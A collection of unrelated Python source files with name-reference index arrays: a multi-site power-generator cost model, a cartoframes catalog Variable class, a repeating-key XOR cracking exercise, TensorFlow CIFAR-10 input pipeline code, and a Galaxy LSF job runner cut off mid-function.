('timestep_hrs', float, None)
]
def complete_configuration_pre_expand(self):
"""Complete the configuration prior to expanding the
period configs.
This implementation checks that the lifetime_yrs is a multiple
of time_period_yrs, and sets the startup state and params_to_site from the
configuration strings.
"""
time_period_yrs = self.config['time_period_yrs']
lifetime_yrs = self.config['lifetime_yrs']
error = None
if isinstance(lifetime_yrs, dict):
for value in lifetime_yrs.itervalues():
div = value / time_period_yrs
if not (float(int(div)) == div):
error = value
else:
div = lifetime_yrs / time_period_yrs
if not (float(int(div)) == div):
error = lifetime_yrs
if error is not None:
msg = ('In section ' + self.config['section'] + ', lifetime_yrs = ' +
str(error) + ' which is required to be a multiple of time_period_yrs of ' +
str(time_period_yrs))
raise mureilexception.ConfigException(msg, {})
# Set the startup state and the params to site from the configuration strings.
if self.config['startup_data_string'] is not None:
self.set_startup_state(self.config['startup_data_string'])
if len(self.config['params_to_site_data_string']) > 0:
self.params_to_site = self.config['params_to_site_data_string']
def get_data_types(self):
"""Return a list of keys for each type of
data required, for example ts_wind, ts_demand.
Outputs:
data_type: list of strings - each a key name
describing the data required for this generator.
"""
data_types = []
if len(self.config['startup_data_name']) > 0:
data_types.append(self.config['startup_data_name'])
if len(self.config['params_to_site_data_name']) > 0:
data_types.append(self.config['params_to_site_data_name'])
return data_types
def set_data(self, data):
"""Set the data dict with the data series required
for the generator.
This implementation looks for the data types:
self.config['startup_data_name']: Interpets this into
the startup state, using the set_startup_state function.
self.config['params_to_site_data_name']: Sets self.params_to_site
to this.
Inputs:
data: dict - with keys matching those requested by
get_data_types.
"""
startup_data_name = self.config['startup_data_name']
if (len(startup_data_name) > 0) and (startup_data_name in data):
self.set_startup_state(data[startup_data_name])
params_to_site_name = self.config['params_to_site_data_name']
if (len(params_to_site_name) > 0) and (params_to_site_name in data):
self.params_to_site = data[params_to_site_name]
def set_startup_state(self, startup_data):
"""Set the startup state from the data provided. Sets
self.startup_state from this.
Inputs:
startup_data: An array of generators * 4:
[[site_index, capacity, build_date, decommissioning_period],
...]
"""
# Check if the startup data is empty. If so, just return.
if len(startup_data) == 0:
return
# Find out which build periods are covered.
startup_data = numpy.array(startup_data)
if not (len(startup_data.shape) == 2):
raise mureilexception.ConfigException('startup data array for module ' +
self.config['section'] + ' is not rectangular.', {})
if not (startup_data.shape[1] == 4):
raise mureilexception.ConfigException('startup data array for module ' +
self.config['section'] + ' shape ' + str(startup_data.shape) +
' but (n, 4) is required.', {})
self.extra_periods = map(int,
(list(set(startup_data[:,2].tolist() + self.extra_periods))))
self.extra_periods.sort()
# And insert each existing generator into the starting state.
cap_list = self.startup_state['capacity']
hist_list = self.startup_state['history']
for i in range(startup_data.shape[0]):
site_index = int(startup_data[i, 0])
new_cap = startup_data[i, 1]
period = int(startup_data[i, 2])
decomm_date = int(startup_data[i, 3])
new_entry = (new_cap, period, decomm_date)
if decomm_date < self.run_periods[0]:
logger.warning('Model in section ' + self.config['section'] +
' adds startup capacity decommissioned at end of ' + decomm_date +
' but the first run period is ' + self.run_periods[0] +
' so it has been removed from the startup state.')
if site_index not in hist_list:
hist_list[site_index] = []
hist_list[site_index].append(new_entry)
else:
new_entry = (new_cap, period, decomm_date)
if site_index not in cap_list:
cap_list[site_index] = []
cap_list[site_index].append(new_entry)
def get_param_count(self):
"""Return the number of parameters that this generator,
as configured, requires to be optimised, per time period.
Outputs:
param_count: non-negative integer - the number of
parameters required per time period.
"""
return len(self.params_to_site)
def get_param_starts(self):
"""Return two nested lists - one for min, one max, for starting values for the
params. Must be either [[]] or [len(run_periods),param_count].
Outputs:
min_start_list: list of param integers, or [[]]
max_start_list: list of param integers, or [[]]
"""
param_count = self.get_param_count()
period_count = len(self.run_periods)
if param_count > 0:
if (self.config['start_min_param'] == 1e20):
start_mins = [[]]
else:
start_mins = (numpy.ones((period_count, param_count)) * self.config['start_min_param']).tolist()
if (self.config['start_max_param'] == 1e20):
start_maxs = [[]]
else:
start_maxs = (numpy.ones((period_count, param_count)) * self.config['start_max_param']).tolist()
else:
start_mins = [[]]
start_maxs = [[]]
return start_mins, start_maxs
def update_state_new_period_list(self, state_handle, period, new_capacity):
"""Implements update_state_new_period_list as defined in txmultigeneratorbase,
for the state_handle format for this multi-site implementation.
"""
state_handle['curr_period'] = period
cap_list = state_handle['capacity']
for site_index, new_cap, decomm_date in new_capacity:
site_index = int(site_index)
new_entry = (new_cap, period, int(decomm_date))
if site_index not in cap_list:
cap_list[site_index] = []
cap_list[site_index].append(new_entry)
return None
def update_state_new_period_params(self, state_handle, period, new_params):
"""Implements update_state_new_period_params as defined in txmultigeneratorbase,
for the state_handle format for this multi-site implementation.
Filters any negative new_params values to 0.
"""
state_handle['curr_period'] = period
curr_conf = self.period_configs[period]
decomm_date = int(curr_conf['lifetime_yrs'] - curr_conf['time_period_yrs'] + period)
cap_list = state_handle['capacity']
new_cap = numpy.array(new_params).clip(0) * curr_conf['size']
for i in (numpy.nonzero(new_cap)[0]):
site_index = self.params_to_site[i]
new_entry = (new_cap[i], period, decomm_date)
if site_index not in cap_list:
cap_list[site_index] = []
cap_list[site_index].append(new_entry)
return None
def calculate_update_decommission(self, state_handle):
"""Implements update_decommission as defined in txmultigeneratorbase,
for the state_handle format for this multi-site implementation.
"""
period = state_handle['curr_period']
cap_list = state_handle['capacity']
hist_list = state_handle['history']
total_cost = 0.0
sites = []
cost = []
decommissioned = []
fully_decommissioned = []
decomm_cost = self.period_configs[period]['decommissioning_cost']
for site, site_caps in cap_list.iteritems():
decomm = [tup for tup in site_caps if (tup[2] == period)]
if len(decomm) > 0:
sites.append(site)
decom_cap = sum([tup[0] for tup in decomm])
decommissioned.append(decom_cap)
this_cost = decom_cap * decomm_cost
cost.append(this_cost)
total_cost += this_cost
# add the decommissioned capacity to the 'history' list
if not site in hist_list:
hist_list[site] = []
hist_list[site] += decomm
# and rebuild the list of what's left
# note that the expression in here is the complement of that to compute
# decomm above.
new_list = [tup for tup in site_caps if not (tup[2] == period)]
# if all capacity is gone from this site
if len(new_list) == 0:
fully_decommissioned.append(site)
else:
cap_list[site] = new_list
for site in fully_decommissioned:
del cap_list[site]
return total_cost, zip(sites, decommissioned, cost)
def calculate_new_capacity_cost(self, state_handle):
"""Implements calculate_new_capacity_cost as defined in TxMultiGeneratorBase,
for the state_handle format for this multi-site implementation. Calculates
the cost as a simple multiple of the new capacity size.
"""
period = state_handle['curr_period']
cap_list = state_handle['capacity']
hist_list = state_handle['history']
total_cost = 0.0
sites = []
cost = []
new_capacity = []
for site, value in cap_list.iteritems():
try:
hist = hist_list[site]
except KeyError:
hist = []
this_cost, new_cap = self.calculate_capital_cost_site(
(value, hist), period, site)
if new_cap > 0:
sites.append(site)
new_capacity.append(new_cap)
cost.append(this_cost)
total_cost += this_cost
return total_cost, zip(sites, new_capacity, cost)
def calculate_capital_cost_site(self, site_data, period, site):
""""Calculate the incremental capital cost incurred in this
period by the new capacity, for this site.
This is a useful function for generators to override to implement
cost functions that depend on the existing installed capacity.
This function charges a per-MW cost plus an install figure if all
the current capacity is new, and the site has not been used before
for this type of generator.
Inputs:
site_data: a pair of lists - (current_capacity, history), each
a list of tuples of (capacity, build, decom) from the
state_handle.
period: the current period, an integer
site: the site index
Outputs:
cost: the cost in $M of this new capacity
new_capacity: the total new capacity installed at this site
"""
new_cap_list = [tup[0] for tup in site_data[0] if (tup[1] == period)]
new_cap = sum(new_cap_list)
capacity_cost = self.period_configs[period]['capital_cost']
this_cost = new_cap * capacity_cost
install_cost = self.period_configs[period]['install_cost']
if install_cost > 0:
# check if all the current capacity is new
if len(new_cap_list) == len(site_data[0]):
# and check if the site has been used before, ever
if len(site_data[1]) == 0:
# the site is new, so charge the 'install' as well
this_cost += install_cost
return this_cost, new_cap
def get_capacity(self, state_handle):
"""Implement the get_capacity function as defined in TxMultiGeneratorBase, for this
multi-site implementation.
"""
index_list = self.get_site_indices(state_handle)
cap_list = state_handle['capacity']
capacity = []
for site in index_list:
capacity.append(sum([tup[0] for tup in cap_list[site]]))
return capacity
def get_site_indices(self, state_handle):
"""Implement the get_site_indices function as defined in TxMultiGeneratorBase, for this
multi-site implementation.
"""
site_indices = state_handle['capacity'].keys()
site_indices.sort()
return site_indices
def calculate_time_period_simple(self, state_handle, period, new_params,
supply_request, full_results=False):
"""Implement calculate_time_period_simple as defined in TxMultiGeneratorBase for
the multi-site generator model.
"""
curr_config = self.period_configs[period]
# Update the state and get the calculations for each site
self.update_state_new_period_params(state_handle, period, new_params)
site_indices = self.get_site_indices(state_handle)
capital_cost, new_capacity = self.calculate_new_capacity_cost(state_handle)
supply_list, variable_cost_list, carbon_emissions_list, other_list = (
self.calculate_outputs_and_costs(state_handle, supply_request))
if full_results:
capacity = self.get_capacity(state_handle)
# Compute the total supply
supply = numpy.sum(supply_list, axis=0)
# Compute the total variable costs, including carbon cost, for the timeseries, scaled up
cost = ((numpy.sum(variable_cost_list, axis=0) +
(numpy.sum(carbon_emissions_list, axis=0) * curr_config['carbon_price_m'])) * (
curr_config['variable_cost_mult']))
# Do the decommissioning
decomm_cost, decommissioned = self.calculate_update_decommission(state_handle)
# Add the capital and decommissioning costs
cost += decomm_cost
cost += capital_cost
if not full_results:
return site_indices, cost, supply
if full_results:
results = {}
results['site_indices'] = site_indices
results['cost'] = cost
results['aggregate_supply'] = supply
results['capacity'] = capacity
results['decommissioned'] = decommissioned
results['new_capacity'] = new_capacity
results['supply'] = supply_list
results['variable_cost_period'] = variable_cost_list * curr_config['variable_cost_mult']
results['carbon_emissions_period'] = (carbon_emissions_list *
curr_config['time_scale_up_mult'])
results['total_supply_period'] = (curr_config['time_scale_up_mult'] * numpy.sum(supply) *
curr_config['timestep_hrs'])
results['other'] = other_list
results['desc_string'] = self.get_simple_desc_string(results, state_handle)
return site_indices, cost, supply, results
def calculate_time_period_full(self, state_handle, period, new_params, supply_request,
max_supply=[], price=[], make_string=False, do_decommissioning=True):
"""Implement calculate_time_period_full as defined in TxMultiGeneratorBase for
the multi-site generator model.
"""
results = {}
self.update_state_new_period_params(state_handle, period, new_params)
results['site_indices'] = self.get_site_indices(state_handle)
results['capacity'] = self.get_capacity(state_handle)
dummy, results['new_capacity'] = self.calculate_new_capacity_cost(state_handle)
results['supply'], results['variable_cost_ts'], results['carbon_emissions_ts'], results['other'] = (
self.calculate_outputs_and_costs(state_handle, supply_request, max_supply, price))
if do_decommissioning:
dummy, results['decommissioned'] = (
self.calculate_update_decommissioning(state_handle))
else:
results['decommissioned'] = []
if make_string:
results['desc_string'] = self.get_full_desc_string(results, state_handle)
return results
def recalculate_time_period_full(self, state_handle, results, supply_request, max_supply=[], price=[], make_string=False):
"""Implement recalculate_time_period_full as defined in TxMultiGeneratorBase for
the multi-site generator model.
"""
results['supply'], results['variable_cost_ts'], results['carbon_emissions_ts'], results['other'] = (
self.calculate_outputs_and_costs(state_handle, supply_request, max_supply, price))
if make_string:
results['desc_string'] = self.get_full_desc_string(results, state_handle)
return results
else:
return results
def calculate_costs_from_schedule_and_finalise(self, state_handle, schedule, make_string=False):
"""Calculate the costs, given the schedule from the dispatcher.
Finalise the decommissioning for that period.
This assumes that update_state_new_period_params has been called previously,
and the offer quantities have been determined for the active sites.
Inputs:
state_handle:
as for calculate_time_period_full in txmultigeneratorbase.py
schedule: a set of timeseries for each active site, as previously
listed in the call to get_offers_*
Outputs:
as for calculate_time_period_full in txmultigeneratorbase.py
"""
results = {}
site_indices = self.get_site_indices(state_handle)
results['site_indices'] = site_indices
results['capacity'] = self.get_capacity(state_handle)
results['new_capacity_total_cost'], results['new_capacity'] = self.calculate_new_capacity_cost(state_handle)
results['supply'] = schedule
results['variable_cost_ts'], results['carbon_emissions_ts'], results['other'] = (
self.calculate_variable_costs(state_handle, site_indices, schedule))
results['decomm_total_cost'], results['decommissioned'] = (
self.calculate_update_decommission(state_handle))
if make_string:
results['desc_string'] = self.get_full_desc_string(results, state_handle)
return results
| [
[
[
1256,
1271
],
[
6423,
6438
],
[
9145,
9160
],
[
9365,
9380
]
],
[
[
1273,
1286
],
[
4673,
4686
],
[
4806,
4819
]
],
[
[
1295,
1299
]
],
[
[
1308,
1313
],
[
9052,
9057
],
[
11959,
11964
],
[
12188,
12193
],
[
13740,
13745
],
[
13813,
13818
],
[
20633,
20638
],
[
20790,
20795
],
[
20845,
20850
],
[
22008,
22013
]
],
[
[
1337,
1357
],
[
1449,
1469
],
[
2061,
2081
],
[
4379,
4399
]
],
[
[
1368,
1375
],
[
1386,
1393
]
],
[
[
1377,
1383
],
[
10254,
10260
]
],
[
[
1423,
1448
]
]
] |
import pandas as pd
from .entity import CatalogEntity
from .repository.dataset_repo import get_dataset_repo
from .repository.variable_repo import get_variable_repo
from .repository.constants import VARIABLE_FILTER
from .summary import variable_describe, head, tail, counts, quantiles, top_values, histogram
_DESCRIPTION_LENGTH_LIMIT = 50
class Variable(CatalogEntity):
"""This class represents a :py:class:`Variable <cartoframes.data.observatory.Variable>`
of datasets in the :py:class:`Catalog <cartoframes.data.observatory.Catalog>`.
Variables contain column names, description, data type, aggregation method, and some other metadata that is
useful to understand the underlying data inside a :obj:`Dataset`
Examples:
List the variables of a :py:class:`Dataset <cartoframes.data.observatory.Dataset>`
in combination with nested filters (categories, countries, etc.)
>>> dataset = Dataset.get('mbi_retail_turn_705247a')
>>> dataset.variables
[<Variable.get('RT_CI_95050c10')> #'Retail Turnover: index (country eq.100)', ...]
"""
_entity_repo = get_variable_repo()
@property
def datasets(self):
"""Get the list of datasets related to this variable.
Returns:
:py:class:`CatalogList <cartoframes.data.observatory.entity.CatalogList>` List of Dataset instances.
Raises:
CatalogError: if there's a problem when connecting to the catalog or no datasets are found.
"""
return get_dataset_repo().get_all({VARIABLE_FILTER: self.id})
@property
def name(self):
"""Name of this variable."""
return self.data['name']
@property
def description(self):
"""Description of this variable."""
return self.data['description']
@property
def column_name(self):
"""Column name of the actual table related to the variable in the :obj:`Dataset`."""
return self.data['column_name']
@property
def db_type(self):
"""Type in the database.
Returns:
str
Examples: INTEGER, STRING, FLOAT, GEOGRAPHY, JSON, BOOL, etc.
"""
return self.data['db_type']
@property
def dataset(self):
"""ID of the :obj:`Dataset` to which this variable belongs."""
return self.data['dataset_id']
@property
def agg_method(self):
"""Text representing a description of the aggregation method used to compute the values in this `Variable`"""
return self.data['agg_method']
@property
def variable_group(self):
"""If any, ID of the variable group to which this variable belongs."""
return self.data['variable_group_id']
@property
def summary(self):
"""JSON object with extra metadata that summarizes different properties of this variable."""
return self.data['summary_json']
@property
def project_name(self):
project, _, _, _ = self.id.split('.')
return project
@property
def schema_name(self):
_, schema, _, _ = self.id.split('.')
return schema
@property
def dataset_name(self):
_, _, dataset, _ = self.id.split('.')
return dataset
def describe(self, autoformat=True):
"""Shows a summary of the actual stats of the variable (column) of the dataset.
Some of the stats provided per variable are: avg, max, min, sum, range,
stdev, q1, q3, median and interquartile_range
Args:
autoformat (boolean): set automatic format for values. Default is True.
Example:
.. code::
# avg average value
# max max value
# min min value
# sum sum of all values
# range
# stdev standard deviation
# q1 first quantile
# q3 third quantile
# median median value
# interquartile_range
"""
FLOAT_FORMAT = 'display.float_format'
if autoformat:
pd.set_option(FLOAT_FORMAT, lambda x: '%.3f' % x)
data = self.data['summary_json']
return variable_describe(data)
def head(self):
"""Returns a sample of the 10 first values of the variable data.
For the cases of datasets with a content fewer than 10 rows
(i.e. zip codes of small countries), this method won't return anything
"""
data = self.data['summary_json']
return head(self.__class__, data)
def tail(self):
"""Returns a sample of the 10 last values of the variable data.
For the cases of datasets with a content fewer than 10 rows
(i.e. zip codes of small countries), this method won't return anything
"""
data = self.data['summary_json']
return tail(self.__class__, data)
def counts(self):
"""Returns a summary of different counts over the actual variable values.
Example:
.. code::
# all total number of values
# null total number of null values
# zero number of zero-valued entries
# extreme number of values 3stdev outside the interquartile range
# distinct number of distinct (unique) entries
# outliers number of outliers (outside 1.5stdev the interquartile range
# zero_percent percent of values that are zero
# distinct_percent percent of values that are distinct
"""
data = self.data['summary_json']
return counts(data)
def quantiles(self):
"""Returns the quantiles of the variable data."""
data = self.data['summary_json']
return quantiles(data)
def top_values(self):
"""Returns information about the top values of the variable data."""
data = self.data['summary_json']
return top_values(data)
def histogram(self):
"""Plots an histogram with the variable data."""
data = self.data['summary_json']
return histogram(data)
def __repr__(self):
descr = self.description
if descr and len(descr) > _DESCRIPTION_LENGTH_LIMIT:
descr = descr[0:_DESCRIPTION_LENGTH_LIMIT] + '...'
return "<{classname}.get('{entity_id}')> #'{descr}'" \
.format(classname=self.__class__.__name__, entity_id=self._get_print_id(), descr=descr)
| [
[
[
7,
19
],
[
4241,
4243
]
],
[
[
41,
54
],
[
358,
371
]
],
[
[
92,
108
],
[
1522,
1538
]
],
[
[
147,
164
],
[
1121,
1138
]
],
[
[
199,
214
],
[
1550,
1565
]
],
[
[
236,
253
],
[
4348,
4365
]
],
[
[
255,
259
],
[
4683,
4687
]
],
[
[
261,
265
],
[
5020,
5024
]
],
[
[
267,
273
],
[
5853,
5859
]
],
[
[
275,
284
],
[
6006,
6015
]
],
[
[
286,
296
],
[
6182,
6192
]
],
[
[
298,
307
],
[
6338,
6347
]
],
[
[
310,
335
],
[
6447,
6472
],
[
6502,
6527
]
],
[
[
349,
357
]
]
] |
from libcrypto import hamming_distance
from libcrypto import split_blocks
from libcrypto import xor
from libcrypto import freq_score
from base64 import b64decode
from operator import itemgetter
def main():
file64 = ""
for line in open("../assets/inputS1C6.txt","r"):
file64 += line.rstrip()
file = bytearray(b64decode(file64))
distances = []
for keysize in range(2,40):
dist = 0
sample_size = 10
for ctr in range(0, sample_size):
b1 = bytearray(file[(keysize*ctr):(keysize*(ctr+1))])
b2 = bytearray(file[(keysize*(ctr+1)):(keysize*(ctr+2))])
dist += hamming_distance(b1, b2) / float(keysize)
dist /= sample_size
distances.append([keysize, dist])
distances = sorted(distances,key=itemgetter(1))[:1]
print("Possible Solutions...\n")
for key in distances:
passphrase = ""
key = key[0]
blocks = split_blocks(key,file)
transposed_blocks = []
for idx in range(0,key):
tblock = bytearray()
for block in blocks:
try:
tblock.append(block[idx])
except IndexError:
pass
transposed_blocks.append(tblock)
for block in transposed_blocks:
bytekeys = []
for i in range(1,int("ff",16)):
xor_bytes = xor(bytearray(bytes({i})),block)
try:
xor_string = xor_bytes.decode("ascii")
bytekeys.append([i,xor_string,freq_score(xor_string)])
except UnicodeDecodeError:
next
bytekeys.sort(key=lambda x: x[2], reverse=True)
bkey = bytekeys[:1][0]
passphrase += chr(bkey[0])
print("Key:{0}\n".format(passphrase))
print(xor(bytearray(passphrase.encode()),bytearray(file)).decode())
if __name__ == "__main__":
main() | [
[
[
22,
38
],
[
645,
661
]
],
[
[
61,
73
],
[
941,
953
]
],
[
[
96,
99
],
[
1407,
1410
],
[
1861,
1864
]
],
[
[
122,
132
],
[
1571,
1581
]
],
[
[
153,
162
],
[
333,
342
]
],
[
[
184,
194
],
[
795,
805
]
],
[
[
201,
205
],
[
1955,
1959
]
]
] |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Routine for decoding the CIFAR-10 binary file format."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
# Process images of this size. Note that this differs from the original CIFAR
# image size of 32 x 32. If one alters this number, then the entire model
# architecture will change and any model would need to be retrained.
IMAGE_SIZE = 24
# Global constants describing the CIFAR-10 data set.
NUM_CLASSES = 10
NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN = 50000
NUM_EXAMPLES_PER_EPOCH_FOR_EVAL = 10000
def read_cifar10(filename_queue):
"""Reads and parses examples from CIFAR10 data files.
Recommendation: if you want N-way read parallelism, call this function
N times. This will give you N independent Readers reading different
files & positions within those files, which will give better mixing of
examples.
Args:
filename_queue: A queue of strings with the filenames to read from.
Returns:
An object representing a single example, with the following fields:
height: number of rows in the result (32)
width: number of columns in the result (32)
depth: number of color channels in the result (3)
key: a scalar string Tensor describing the filename & record number
for this example.
label: an int32 Tensor with the label in the range 0..9.
uint8image: a [height, width, depth] uint8 Tensor with the image data
"""
class CIFAR10Record(object):
pass
result = CIFAR10Record()
# Dimensions of the images in the CIFAR-10 dataset.
# See http://www.cs.toronto.edu/~kriz/cifar.html for a description of the
# input format.
label_bytes = 1 # 2 for CIFAR-100
result.height = 32
result.width = 32
result.depth = 3
image_bytes = result.height * result.width * result.depth
# Every record consists of a label followed by the image, with a
# fixed number of bytes for each.
record_bytes = label_bytes + image_bytes
# Read a record, getting filenames from the filename_queue. No
# header or footer in the CIFAR-10 format, so we leave header_bytes
# and footer_bytes at their default of 0.
reader = tf.FixedLengthRecordReader(record_bytes=record_bytes)
result.key, value = reader.read(filename_queue)
# Convert from a string to a vector of uint8 that is record_bytes long.
record_bytes = tf.decode_raw(value, tf.uint8)
# The first bytes represent the label, which we convert from uint8->int32.
result.label = tf.cast(
tf.strided_slice(record_bytes, [0], [label_bytes], [1]), tf.int32)
# The remaining bytes after the label represent the image, which we reshape
# from [depth * height * width] to [depth, height, width].
depth_major = tf.reshape(
tf.strided_slice(record_bytes, [label_bytes],
[label_bytes + image_bytes], [1]),
[result.depth, result.height, result.width])
# Convert from [depth, height, width] to [height, width, depth].
result.uint8image = tf.transpose(depth_major, [1, 2, 0])
return result
def _generate_image_and_label_batch(image, label, min_queue_examples,
batch_size, shuffle):
"""Construct a queued batch of images and labels.
Args:
image: 3-D Tensor of [height, width, 3] of type.float32.
label: 1-D Tensor of type.int32
min_queue_examples: int32, minimum number of samples to retain
in the queue that provides of batches of examples.
batch_size: Number of images per batch.
shuffle: boolean indicating whether to use a shuffling queue.
Returns:
images: Images. 4D tensor of [batch_size, height, width, 3] size.
labels: Labels. 1D tensor of [batch_size] size.
"""
# Create a queue that shuffles the examples, and then
# read 'batch_size' images + labels from the example queue.
num_preprocess_threads = 16
if shuffle:
images, label_batch = tf.train.shuffle_batch(
[image, label],
batch_size=batch_size,
num_threads=num_preprocess_threads,
capacity=min_queue_examples + 3 * batch_size,
min_after_dequeue=min_queue_examples)
else:
images, label_batch = tf.train.batch(
[image, label],
batch_size=batch_size,
num_threads=num_preprocess_threads,
capacity=min_queue_examples + 3 * batch_size)
# Display the training images in the visualizer.
tf.summary.image('images', images)
return images, tf.reshape(label_batch, [batch_size])
def distorted_inputs(data_dir, batch_size):
"""Construct distorted input for CIFAR training using the Reader ops.
Args:
data_dir: Path to the CIFAR-10 data directory.
batch_size: Number of images per batch.
Returns:
images: Images. 4D tensor of [batch_size, IMAGE_SIZE, IMAGE_SIZE, 3] size.
labels: Labels. 1D tensor of [batch_size] size.
"""
filenames = [os.path.join(data_dir, 'data_batch_%d.bin' % i)
for i in xrange(1, 6)]
for f in filenames:
if not tf.gfile.Exists(f):
raise ValueError('Failed to find file: ' + f)
# Create a queue that produces the filenames to read.
filename_queue = tf.train.string_input_producer(filenames)
# Read examples from files in the filename queue.
read_input = read_cifar10(filename_queue)
reshaped_image = tf.cast(read_input.uint8image, tf.float32)
height = IMAGE_SIZE
width = IMAGE_SIZE
# Image processing for training the network. Note the many random
# distortions applied to the image.
# Randomly crop a [height, width] section of the image.
distorted_image = tf.random_crop(reshaped_image, [height, width, 3])
# Randomly flip the image horizontally.
distorted_image = tf.image.random_flip_left_right(distorted_image)
# Because these operations are not commutative, consider randomizing
# the order their operation.
distorted_image = tf.image.random_brightness(distorted_image,
max_delta=63)
distorted_image = tf.image.random_contrast(distorted_image,
lower=0.2, upper=1.8)
# Subtract off the mean and divide by the variance of the pixels.
float_image = tf.image.per_image_standardization(distorted_image)
# Set the shapes of tensors.
float_image.set_shape([height, width, 3])
read_input.label.set_shape([1])
# Ensure that the random shuffling has good mixing properties.
min_fraction_of_examples_in_queue = 0.4
min_queue_examples = int(NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN *
min_fraction_of_examples_in_queue)
print ('Filling queue with %d CIFAR images before starting to train. '
'This will take a few minutes.' % min_queue_examples)
# Generate a batch of images and labels by building up a queue of examples.
return _generate_image_and_label_batch(float_image, read_input.label,
min_queue_examples, batch_size,
shuffle=True)
def inputs(eval_data, data_dir, batch_size):
"""Construct input for CIFAR evaluation using the Reader ops.
Args:
eval_data: bool, indicating if one should use the train or eval data set.
data_dir: Path to the CIFAR-10 data directory.
batch_size: Number of images per batch.
Returns:
images: Images. 4D tensor of [batch_size, IMAGE_SIZE, IMAGE_SIZE, 3] size.
labels: Labels. 1D tensor of [batch_size] size.
"""
if not eval_data:
filenames = [os.path.join(data_dir, 'data_batch_%d.bin' % i)
for i in xrange(1, 6)]
num_examples_per_epoch = NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN
else:
filenames = [os.path.join(data_dir, 'test_batch.bin')]
num_examples_per_epoch = NUM_EXAMPLES_PER_EPOCH_FOR_EVAL
for f in filenames:
if not tf.gfile.Exists(f):
raise ValueError('Failed to find file: ' + f)
# Create a queue that produces the filenames to read.
filename_queue = tf.train.string_input_producer(filenames)
# Read examples from files in the filename queue.
read_input = read_cifar10(filename_queue)
reshaped_image = tf.cast(read_input.uint8image, tf.float32)
height = IMAGE_SIZE
width = IMAGE_SIZE
# Image processing for evaluation.
# Crop the central [height, width] of the image.
resized_image = tf.image.resize_image_with_crop_or_pad(reshaped_image,
width, height)
# Subtract off the mean and divide by the variance of the pixels.
float_image = tf.image.per_image_standardization(resized_image)
# Ensure that the random shuffling has good mixing properties.
min_fraction_of_examples_in_queue = 0.4
min_queue_examples = int(num_examples_per_epoch *
min_fraction_of_examples_in_queue)
# Generate a batch of images and labels by building up a queue of examples.
if eval_data:
read_input.label.set_shape((1,))
return _generate_image_and_label_batch(float_image, read_input.label,
min_queue_examples, batch_size,
shuffle=False)
| [
[
[
774,
789
]
],
[
[
813,
821
]
],
[
[
845,
859
]
],
[
[
868,
870
],
[
5633,
5635
],
[
8224,
8226
],
[
8399,
8401
]
],
[
[
894,
900
],
[
5705,
5711
],
[
8298,
8304
]
],
[
[
945,
961
],
[
2950,
2952
],
[
3146,
3148
],
[
3167,
3169
],
[
3272,
3274
],
[
3287,
3289
],
[
3344,
3346
],
[
3510,
3512
],
[
3528,
3530
],
[
3772,
3774
],
[
4676,
4678
],
[
4933,
4935
],
[
5156,
5158
],
[
5209,
5211
],
[
5752,
5754
],
[
5900,
5902
],
[
6058,
6060
],
[
6089,
6091
],
[
6331,
6333
],
[
6445,
6447
],
[
6617,
6619
],
[
6742,
6744
],
[
6936,
6938
],
[
8536,
8538
],
[
8684,
8686
],
[
8842,
8844
],
[
8873,
8875
],
[
9036,
9038
],
[
9248,
9250
]
],
[
[
1184,
1194
],
[
6113,
6123
],
[
6134,
6144
],
[
8897,
8907
],
[
8918,
8928
]
],
[
[
1254,
1265
]
],
[
[
1271,
1303
],
[
7233,
7265
],
[
8341,
8373
]
],
[
[
1312,
1343
],
[
8470,
8501
]
],
[
[
1358,
1370
],
[
6010,
6022
],
[
8794,
8806
]
],
[
[
3832,
3863
],
[
7554,
7585
],
[
9661,
9692
]
],
[
[
5253,
5269
]
],
[
[
7751,
7757
]
]
] |
# A simple CLI runner for slurm that can be used when running Galaxy from a
# non-submit host and using a Slurm cluster.
from logging import getLogger
try:
from galaxy.model import Job
job_states = Job.states
except ImportError:
# Not in Galaxy, map Galaxy job states to Pulsar ones.
from pulsar.util import enum
job_states = enum(RUNNING='running', OK='complete', QUEUED='queued', ERROR="failed")
from ..job import BaseJobExec
log = getLogger(__name__)
argmap = {
'memory': '-M', # There is code in job_script_kwargs relying on this name's setting
'cores': '-n',
'queue': '-q',
'working_dir': '-cwd',
'project': '-P'
}
class LSF(BaseJobExec):
def __init__(self, **params):
self.params = {}
for k, v in params.items():
self.params[k] = v
def job_script_kwargs(self, ofile, efile, job_name):
scriptargs = {'-o': ofile,
'-e': efile,
'-J': job_name}
# Map arguments using argmap.
for k, v in self.params.items():
if k == 'plugin':
continue
try:
if k == 'memory':
# Memory requires both -m and -R rusage[mem=v] request
scriptargs['-R'] = "\"rusage[mem=%s]\"" % v
if not k.startswith('-'):
k = argmap[k]
scriptargs[k] = v
except Exception:
log.warning('Unrecognized long argument passed to LSF CLI plugin: %s' % k)
# Generated template.
template_scriptargs = ''
for k, v in scriptargs.items():
template_scriptargs += '#BSUB %s %s\n' % (k, v)
return dict(headers=template_scriptargs)
def submit(self, script_file):
# bsub returns Job <9147983> is submitted to default queue <research-rh7>.
# This should be really handled outside with something like
# parse_external. Currently CLI runner expect this to just send it in the last position
# of the string.
return "bsub <%s | awk '{ print $2}' | sed 's/[<>]//g'" % script_file
def delete(self, job_id):
return 'bkill %s' % job_id
def get_status(self, job_ids=None):
return "bjobs -a -o \"id stat\" -noheader" # check this
def get_single_status(self, job_id):
return "bjobs -o stat -noheader " + job_id
def parse_status(self, status, job_ids):
# Get status for each job, skipping header.
rval = {}
for line in status.splitlines():
job_id, state = line.split()
if job_id in job_ids:
# map job states to Galaxy job states.
rval[job_id] = self._get_job_state(state)
return rval
def parse_single_status(self, status, job_id):
if not status:
# Job not found in LSF, most probably finished and forgotten.
# lsf outputs: Job <num> is not found -- but that is on the stderr
# Note: a very old failed job job will not be shown here either,
# which would be badly handled here. So this only works well when Galaxy
# is constantly monitoring the jobs. The logic here is that DONE jobs get forgotten
# faster than failed jobs.
